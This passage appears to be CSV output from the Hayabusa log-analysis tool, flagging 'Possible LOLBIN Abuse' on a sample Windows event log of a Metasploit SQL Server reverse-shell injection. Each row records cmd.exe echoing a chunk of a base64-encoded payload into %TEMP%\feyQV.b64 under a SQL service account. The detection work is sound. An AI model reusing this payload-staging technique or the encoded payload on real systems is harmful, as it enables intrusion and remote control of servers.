0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 0FcEEg+JVWOLVwiJTQyLBotN/IniYotGCIXJdAo7wlQGiR6L3usvg/gUcwWL5JgUn8mJQYkIO0UMdkyJRaGJdIcU6wiLTxTIDol3FDvQcgQr0DZ3UNKL1viFBXWxi0UMnVcIiQeLfwyF/3QGV+iJUAAAhb50FIs1MNbYh90+ixt2/9b7xASF9jjyizQQi30IikXwhMB1C19ei8KOi+VdwgwAoU3oi0csxzUMAFoAFYtQXYlRBIkKiQGJSATvTyyLSBTwihCLMNoZ+sEAgQEAi9aB4fPw//9JwcYMiUgMi8kwO89zsYsdOxUMcl6LSASJMYsI4XAEiXEEi0oEifYEiQGJENRCBItFEI5eWz9VXcLuAJCQkJCQVULsg+yri1UTU1ZXi1oIoAL3egwrQzaJRfSNDFCD6yBzBbkgAAAAgHoQAIvBdfWLiRQrcBA7SXdxi0IEUDCJMXsIi3CoiXEEi0tYiUgEiQGJGIlDBMe4DE4AAMyJjCyLmOKLS5SLMyvBM84FAB0A4CUA8P//SMH4DDZDDF/VUXMhiwk7QQzk+YtDBIkwiwOLc1CJcASLQQSJQwSJ7IkTiVlti0cs6VoAAACLdxgrgRcQAAAlAPD//zvBiUX8D4K1AWAAPRcgAABzCoxF/AAgIgA3Rfzy+MHvDE+D//+JffgPh5oBFQA7OxuHK/oAAItGDIXAdAZQ6JVOAACDfBoUAIsajURgFIubTFX1OBA70XMJWsAEvoM4ZHTziVX4ixDf0olV8I6+nAAA8os6hRw5OHUWOU34chGLePyD6BtJhf91BIXJd7iJDotKCItGCAPBiUahixOLMMmnyJsDiUabi3YMhfZ0CRQulIQAwovs8I1CGMcCAAAAAIlCEIvJix4IikoQocl0CIsRFD/OFFoUxkIQAYtNgYtzENx4EIvZwekC8xexy4PhA/OkiUIIi0gwi/NfA87qiQqLQBRIW4lCBDPAi+W1w4uWDIXtdElW6FQaAAD3QYtOFIXJdD2LRvOFcHQJUOinTQAAi1UIV34UjUYUhf90EIsQ+DtPCHboi8eLP4X/dfCLdgyF9nQGVujtTUu0i31Ki0UqUDImXFtAAMPE6OHAdFmLt/y3UBiJUBDHPwAPAACNFAiJeAiJUBTpOSr//4uqKAiLRwiLTggDyEtGBDvIiU4IdgNtRgiLdgyF43QJVtP6TRkAi1UIjk8YxyB1JQAAiU8Qi8fGAP///+Beg8j/W4vlXcPBkN7lPUZV+3KLTd+LVQiNRRBQUVLofHHt/13DkJCQd5AokJCQkFWL7ItNCItFDIlBKF3CCACwi+wii3UIhSR0MH1GFIW9dAeLCIkgbusIaulW6D/0/wzsVQyLTZeJggSLVRSJSMvHUAyLThB3D8pGfWRdLhAAVYvsi1UIU1ZXhdJ0X4tCEIt1EIt9oo25EIXAdCA5eAR1BXxwCHSai8iLzYXAde7rDIsYiaOLShSJCIlR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLfgSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgVW5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo //+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iwQ3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dQuFyX4HSYmIYTAAAF9ezNBbi+VdwggAX7i4lQBqcVuL5V3CCIyQkJCQkFUf7P8gMADO6JNUAIZni+oIGVeLSwTHwHVafUUUX/jzxwAAAJj9M8CL5bjpFACLdRCLfQqF9n8K0ASF/3MEM8CpJWoAaI5CD9RWV+igegAAagBoQEIPAFZXZ0Xs6E9TAACJRfCNRVO5hwQAAI1zDI295JDDH1DzpbkBBAAAh7MQ/MMAjb2vV///jZXo7v//86W5y8IAAI2zYD4AAI294Bj//42F5K7//0eljY3gz///UYsfGDAAAFJBUFH/5OXBMQCLVVAz/zvHiQIuIIs12MFAAP/WhWB3hFcBAOf/yl9eBXeW2ABbJOVdwhQAqg5fXrh3ESgAW4vCXcLNfYuWBIl9EDvAiX34DzgPAQAAiboIiX3814McMAAAA8cRmoQBD4UZAQAAi0gMzJU836//UotxBFaJdfSrhVQAAIXAdSZMhejv1v8Y6ugt9gAAhQB1FVje4M///1FW6GNUAACF5g+EYQAAAIuzHLCuFotFCNn3i7sgYAAAA/i5BQAAAPOlixkgugAAyY306MdEAssAAI0ILd///9ZX6CRUAKiLdQiFwIwPi4sgUQB4gEzjCi4ARDFUjZXo7/9FUlfIAVQAAIWudA+LPCAwAACAbjAKBI1EMAqN1vLP//9Rm+iEUwAAhcB00ouTETAAAIBMMgptjYOYCotN5ot9/EGDxhQ4TRCJdQiLRfiL6mFAg8cmfYCJRfiJffwPgvkx///VOItNFCNFHYkBnUVeO8d0CJ2TmDA11FgQX14zwFsK5V2FFGWQXrgJAAAAW4vls8IUAPOQkGhVi+zyVgZm1AyF/3UFvwIAAACLRRiLdQhQVkpxAQAAwV0Ui00Qg8RbPFFXhxW8wUCPVBZBQgSLBotABIPw/3UeizW7lEAA/yyFvw/qlAAAfvfWX14FgA4KAFtdwiEAgz3cCI4AFHxyakFqIg/0FXDArwCHNv8VbMBAAIvLx0tqAI1NDGrHIYtKBOlRUMcVaMBAAArAdIeLFotCBFCfFcBYQACLDotVDInHBItFEMRqU+xXUZa3AAAAixaDyP/DxMyJQpTWIBpAAGjgZkAA50IkiwbHQCimAAAAi+RWiw5RPCzvrf9fXjPAWLHCkgDCkJDAi+xWk3UIi0Yug/j/dClQ/xXAwUAAi/j/dRaLNdh4QAD/1oWNdCkT1gWA/AqYXl3Dx0YE/////4tGTlLAdGOLQBBQV9vGwEAAx0ZAAAAAADPAXl3DLJCukJCQo5DckNlVaOyLRRCLTRRWi3UIV+jNDItWEGoAV1KJRq6cThanbQYAAF9GaGoAoVDoYQadAIPEGF9eXcM6kJC9kLGQkJCQVYvsU4sjDFZXalBT6M/i//+LdQiL+DPAi9ehjQAAACY4MKvCUIkQigaLCKnolHZi/4v4M8CL17kOAAAA86uLBmo4iVAQiw6L>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+FjAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYGJIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 